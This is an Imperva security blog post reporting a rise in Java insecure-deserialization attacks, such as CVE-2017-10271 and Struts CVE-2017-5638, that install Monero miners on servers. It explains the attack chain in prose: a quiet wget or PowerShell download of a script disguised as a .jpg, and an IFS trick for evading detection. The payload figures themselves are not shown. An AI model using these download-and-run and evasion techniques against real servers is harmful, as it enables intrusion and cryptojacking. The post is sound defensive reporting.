Deserialization Attacks Surge Motivated by Illegal Crypto-mining

Imperva’s research group is constantly monitoring new web application vulnerabilities. In doing so, we’ve noticed at least four major insecure deserialization vulnerabilities that were published in the past year.

Our analysis shows that, in the past three months, the number of deserialization attacks has grown by 300 percent on average, turning them into a serious security risk to web applications.

To make things worse, many of these attacks are now launched with the intent of installing crypto-mining malware on vulnerable web servers, which gridlocks their CPU usage.

In this blog post we will explain what insecure deserialization vulnerabilities are, show the growing trend of attacks exploiting these vulnerabilities and explain what attackers do to exploit them (including real-life attack examples).

What Is Serialization?

The process of serialization converts a “live” object (structure and/or state), like a Java object, into a format that can be sent over the network, or stored in memory or on disk. Deserialization converts the format back into a “live” object.

The purpose of serialization is to preserve an object, meaning that the object will exist outside the lifetime of the local machine on which it is created.

For example, when withdrawing money from an ATM, the information of the account holder and the required operation is stored in a local object. Before this object is sent to the main server, it is serialized in order to perform and approve the needed operations. The server then deserializes the object to complete the operation.

Types of Serialization

There are many types of serialization available, depending on the object which is being serialized and on the purpose. Almost all modern programming languages support serialization. In Java for example an object is converted into a compact representation using byte stream, and the byte stream can then be reverted back into a copy of that object.

Other types of serialization include converting an object into a hierarchical format like JSON or XML. The advantage of this serialization is that the serialized objects can be read as plain text, instead of a byte stream.

Deserialization Vulnerabilities from the Past Three Months

In the OWASP top 10 security risks of 2017 insecure deserialization came in at eighth place and rightfully so as we argued in our previous blog about the state of web application vulnerabilities in 2017.

In 2017, major new vulnerabilities related to insecure serialization, mostly in Java, were published (see Figure 1).

NameRelease Date (Day/Month/Year)Vulnerability details
CVE-2017-1214901/08/2017Vulnerability in the JBoss Application Server allows execution of arbitrary code via crafted serialized data because the HTTP Invoker does not restrict classes for which it performs deserialization
CVE-2017-1027121/06/2017Vulnerability in the Oracle WebLogic Server allows execution of arbitrary code due to insufficient sanitizing of user supplied inputs in the wls-wsat component
CVE-2017-9805

 

21/06/2017The REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads.
CVE-2017-750405/04/2017The HTTPServerILServlet.java in JMS allows remote attackers to execute arbitrary code via crafted serialized data because it does not restrict the classes for which it performs deserialization

Figure 1: CVEs related to insecure deserialization

In order to understand the magnitude of these vulnerabilities, we analyzed attacks from the past three months (October to December of 2017) that try to exploit insecure deserialization. A key observation is the steep increase of deserialization attacks in the past few months, as can be seen in the Figure 2.


Figure 2: Insecure deserialization attacks over the course of three months

Most of the attackers used no attack vectors other than insecure deserialization. We noticed that each attacker was trying to exploit different vulnerabilities, with the above-mentioned CVEs being the most prevalent.

For a full list of CVEs related to insecure deserialization from the past few years see Figure 3.

NameRelevant SystemPublic ExploitNameRelevant SystemPublic Exploit
CVE-2017-9844SAP NetWeaverYesCVE-2016-2170Apache OFBizNo
CVE-2017-9830Code42 CrashPlanNoCVE-2016-2003HP P9000, XP7 Command View Advanced Edition (CVAE) SuiteNo
CVE-2017-9805Apache StrutsYesCVE-2016-2000HP Asset ManagerNo
CVE-2017-7504Red Hat JBossYesCVE-2016-1999HP Release ControlNo
CVE-2017-5878Apache OpenMeetingsYesCVE-2016-1998HP Service ManagerNo
CVE-2017-5645Apache Log4jNoCVE-2016-1997HP Operations OrchestrationNo
CVE-2017-5641Apache BlazeDSYesCVE-2016-1986HP Continuous Delivery AutomationNo
CVE-2017-5586OpenText Documentum D2YesCVE-2016-1985HP Operations ManagerNo
CVE-2017-3159Apache CamelYesCVE-2016-1487Lexmark Markvision EnterpriseNo
CVE-2017-3066Adobe ColdFusionYesCVE-2016-1291Cisco Prime InfrastructureYes
CVE-2017-2608JenkinsYesCVE-2016-0958Adobe Experience ManagerNo
CVE-2017-12149Red Hat JBossYesCVE-2016-0788JenkinsYes
CVE-2017-11284Adobe ColdFusionNoCVE-2016-0779Apache TomEENo
CVE-2017-11283Adobe ColdFusionNoCVE-2016-0714Apache TomcatNo
CVE-2017-1000353CloudBees JenkinsYesCVE-2015-8765McAfee ePolicy OrchestratorNo
CVE-2016-9606ResteasyYesCVE-2015-8581Apache TomEENo
CVE-2016-9299JenkinsYesCVE-2015-8545NetAppNo
CVE-2016-8749Jackson (JSON)YesCVE-2015-8360Atlassian BambooNo
CVE-2016-8744Apache BrooklynYesCVE-2015-8238Unify OpenScapeNo
CVE-2016-8735Apache Tomcat JMXYesCVE-2015-8237Unify OpenScapeNo
CVE-2016-7462VMWare vRealize OperationsNoCVE-2015-8103JenkinsYes
CVE-2016-6809Apache TikaNoCVE-2015-7501Red Hat JBossYes
CVE-2016-5229Atlassian BambooYesCVE-2015-7501Oracle Application Testing SuiteNo
CVE-2016-5004Apache ArchivaYesCVE-2015-7450IBM WebsphereYes
CVE-2016-4385HP Network AutomationNoCVE-2015-7253Commvault Edge ServerYes
CVE-2016-4372HP iMCNoCVE-2015-6934VMWare vCenter/vRealizeNo
CVE-2016-3642Solarwinds Virtualization ManagerYesCVE-2015-6576Atlassian BambooNo
CVE-2016-3461Oracle MySQL Enterprise MonitorYesCVE-2015-6555Symantec Endpoint Protection ManagerYes
CVE-2016-3427JMXYesCVE-2015-6420Cisco (various frameworks)No
CVE-2016-3415Zimbra CollaborationNoCVE-2015-5348Apache CamelNo
CVE-2016-2510Red Hat JBoss BPM SuiteNoCVE-2015-5254Apache ActiveMQNo
CVE-2016-2173Spring AMPQNoCVE-2015-4852Oracle WebLogicYes
CVE-2016-2170Apache OFBizNoCVE-2015-3253JenkinsYes
CVE-2016-2003HP P9000, XP7 Command View Advanced Edition (CVAE) SuiteNoCVE-2012-4858IBM Congnos BINo

Figure 3: CVEs related to insecure deserialization

Deserialization Attacks in the Wild

Most of the attacks that we saw are related to byte-stream serialization of Java objects. Also, we saw some attacks related to serialization to XML and other formats, see Figure 4.


Figure 4: Distribution of vulnerabilities over different serialization formats

In the following attack (see Figure 5) the attacker is trying to exploit CVE-2017-10271. The payload is sent in the HTTP request’s body using a serialized Java object through XML representation.

Attack vector containing serialized java array into XML fig 5

Figure 5: Attack vector containing a serialized java array into an XML

The fact that this is a Java array can be seen by the hierarchical structure of the parameters, with the suffix of “java/void/array/void/string”. The attacker is trying to run a bash script on the attacked server.

This bash script tries to send an HTTP request using “wget” OS command, download a shell script disguised as a picture file (note the jpg file extension) and run it. Few interesting notes can be made examining this command:

  • The existence of shell and “wget” commands indicate that this payload is targeting Linux systems
  • Using a picture file extension is usually done to evade security controls
  • The “-q” parameter to “wget” stands for “quiet”, this means that “wget” will have no output to the console, hence it will be harder to note that such a request was even made. Once the downloaded script runs the server is infected with a crypto mining malware trying to mine Monero digital coins (a crypto currency similar to Bitcoin).

The next script (see Figure 6) tries to exploit the same vulnerability, but this time the payload is targeting Windows servers using cmd.exe and Powershell commands to download the malware and run it.

Attack vector infect Windows server with crypto mining malware fig 6

Figure 6: Attack vector trying to infect Windows server with crypto mining malware

This indicates that there are two different infection methods for Windows and Linux server, each system with its designated script.

Another example is the following payload (Figure 7) that we pulled from an attack trying to exploit a deserialization vulnerability with a Java serialized object.

Attack vector containing java serialized object

Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner

The “bad” encoding is an artifact of Java serialization, where the object is represented in the byte stream.

Still, we can see a script in plain text marked in yellow. Shown as an image below is a variable that defines an internal field separator, where in this case it is just a variable for space. The variable is probably used instead of a space to try to make the payload harder to detect.

Just as in the previous examples, this Bash script targets Linux servers that send an HTTP request using “wget” to download a crypto miner.

Beyond Insecure Deserialization

The common denominator of the attacks above is that attackers are trying to infect the server with a crypto mining malware by using an insecure deserialization vulnerability. However insecure deserialization is not the only method to achieve this goal.

Below (Figure 8) we see an example of another attack payload, this time at the “Content-Type” header.

Attack vector using RCE vulnerability of Apache Struts fig 8

Figure 8: Attack vector using an RCE vulnerability of Apache Struts

This attack tries to exploit CVE-2017-5638, a well-known RCE vulnerability related to Apache Struts which was published in March 2017 and was covered in a previous blog post.

When it was originally published we saw no indications of crypto miners in the attacks’ payloads related to this CVE, and most of the payloads were reconnaissance attacks.

However, in this attack the payload (marked in yellow above) is very similar to the payload from the previous example. Using the same remote server and the exact same script, it infected the server with crypto mining malware.

This old attack method with a new payload suggests a new trend in the cyber arena – attackers try to exploit RCE vulnerabilities, new and old, to turn vulnerable servers into crypto miners and get a faster ROI for their “effort”.

Recommendations

Given the many new vulnerabilities related to insecure deserialization that were discovered this year, and its appearance in the OWASP top 10 security risks, we expect to see newer related vulnerabilities released in 2018. In the meantime, organizations using affected servers are advised to use the latest patch to mitigate these vulnerabilities.

An alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.

A WAF that provides virtual patching doesn’t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.

Learn more about how to protect your web applications from vulnerabilities with Imperva WAF solutions.



This is a Security Bloggers Network syndicated blog post authored by Nadav Avital. Read the original post at: Blog | Imperva